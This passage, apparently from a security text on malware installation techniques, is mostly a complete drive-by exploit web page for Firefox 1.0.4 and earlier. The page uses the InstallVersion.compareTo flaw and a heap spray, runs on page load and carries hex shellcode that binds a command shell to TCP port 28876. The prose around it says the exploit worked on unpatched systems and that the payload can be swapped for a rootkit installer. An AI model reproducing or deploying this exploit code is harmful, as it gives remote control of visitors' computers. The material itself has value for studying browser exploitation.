This is perhaps the most widely used installation technique. The following example is a web page that opens a remote connection to any computer browsing the page with Mozilla Firefox version 1.0.4 or earlier. It exploits the InstallVersion.compareTo() flaw (MFSA 2005-50), which does not validate the type of its argument, and uses a heap spray so that the forged object pointer lands on attacker-controlled data; the shellcode binds a command shell to TCP port 28876:
<html>
<head>
<!-- Simple port bind exploit -->
<title>Exploit for Mozilla Firefox version 1.0.4 (or Earlier)</title>
<script language="javascript">
function OnLoadBody()
{
    location.href = "javascript:void (new InstallVersion());";
    CrashAndBurn();
};

// This function fills the heap with a payload and then triggers the flaw
function CrashAndBurn()
{
    // Spray up to this address
    var heapSprayToAddress = 0x12000000;

    // Payload - bind port 28876 to take complete control of the caller
    var ShellcodeBytes =
        "90 90 90 90 eb 43 56 57 8b 45 3c 8b 54 05 78 01 ea 52 8b 52 20 01 " +
        "ea 31 c0 31 c9 41 8b 34 8a 01 ee 31 ff c1 cf 13 ac 01 c7 85 c0 75 " +
        "f6 39 df 75 ea 5a 8b 5a 24 01 eb 66 8b 0c 4b 8b 5a 1c 01 eb 8b 04 " +
        "8b 01 e8 5f 5e ff e0 fc 31 c0 64 8b 40 30 8b 40 0c 8b 70 1c ad 8b " +
        "68 08 31 c0 66 b8 6c 6c 50 68 33 32 2e 64 68 77 73 32 5f 54 bb 71 " +
        "a7 e8 fe e8 90 ff ff ff 89 ef 89 c5 81 c4 70 fe ff ff 54 31 c0 fe " +
        "c4 40 50 bb 22 7d ab 7d e8 75 ff ff ff 31 c0 50 50 50 50 40 50 40 " +
        "50 bb a6 55 34 79 e8 61 ff ff ff 89 c6 31 c0 50 50 35 02 01 70 cc " +
        "fe cc 50 89 e0 50 6a 10 50 56 bb 81 b4 2c be e8 42 ff ff ff 31 c0 " +
        "50 56 bb d3 fa 58 9b e8 34 ff ff ff 58 60 6a 10 54 50 56 bb 47 f3 " +
        "56 c6 e8 23 ff ff ff 89 c6 31 db 53 68 2e 63 6d 64 89 e1 41 31 db " +
        "56 56 56 53 53 31 c0 fe c4 40 50 53 53 53 53 53 53 53 53 53 53 6a " +
        "44 89 e0 53 53 53 53 54 50 53 53 53 43 53 4b 53 53 51 53 87 fd bb " +
        "21 d0 05 d0 e8 df fe ff ff 5b 31 c0 48 50 53 bb 43 cb 8d 5f e8 cf " +
        "fe ff ff 56 87 ef bb 12 6b 6d d0 e8 c2 fe ff ff 83 c4 5c 61 eb 89 ";

    // Use a regular expression to turn each byte pair into a little-endian %u escape
    var payLoadCode = unescape(
        ShellcodeBytes.replace(
            /\s*([0-9A-Fa-f][0-9A-Fa-f])\s*([0-9A-Fa-f][0-9A-Fa-f])/g,
            "%u$2$1"));

    // Size of the heap blocks
    var heapBlockSize = 0x400000;

    // Size of the payload in bytes
    var payLoadSize = payLoadCode.length * 2;

    // Calculate the spray slide size (exclude the block header)
    var spraySlideSize = heapBlockSize - (payLoadSize + 0x38);

    // First spray slide ("pdata") filled with the "pvtbl" address 0x11C0002C
    var spraySlide1 = unescape("%u002C%u11C0");
    spraySlide1 = getSpraySlide(spraySlide1, spraySlideSize);

    // Second spray slide filled with 0x1200002C
    var spraySlide2 = unescape("%u002C%u1200");
    spraySlide2 = getSpraySlide(spraySlide2, spraySlideSize);

    // Third spray slide filled with NOPs
    var spraySlide3 = unescape("%u9090%u9090");
    spraySlide3 = getSpraySlide(spraySlide3, spraySlideSize);

    // Spray the heap, rotating through the three slide types
    var heapBlocks = (heapSprayToAddress - 0x400000) / heapBlockSize;
    var memory = new Array();
    for (var i = 0; i < heapBlocks; i++)
    {
        memory[i] = (i % 3 == 0) ? spraySlide1 + payLoadCode :
                    (i % 3 == 1) ? spraySlide2 + payLoadCode :
                                   spraySlide3 + payLoadCode;
    }

    // Address of the fake "pdata"
    var eaxAddress = 0x1180002C;

    // Trigger the flaw: compareTo() does not check its argument's type
    // and dereferences the number as if it were an object pointer
    (new InstallVersion).compareTo(new Number(eaxAddress >> 1));
}

// Repeat the slide pattern by doubling, then cut it to the requested size in bytes
function getSpraySlide(spraySlide, spraySlideSize)
{
    while (spraySlide.length * 2 < spraySlideSize)
    {
        spraySlide += spraySlide;
    }
    spraySlide = spraySlide.substring(0, spraySlideSize / 2);
    return spraySlide;
}
</script>
</head>
<body onload="OnLoadBody()">
</body>
</html>
This exploit worked against unpatched installations throughout 2005. A similar exploit of the GDI+ JPEG-parsing flaw (MS04-028) gave identical results with Internet Explorer 5 over the same period. In each case the port-binding shellcode can be swapped for a payload that installs a rootkit.
Here are the links to the exploits mentioned above:
www.mozilla.org/projects/security/known-vulnerabilities.html (reference MFSA 2005-50)
www.microsoft.com/technet/security/bulletin/MS04-028.mspx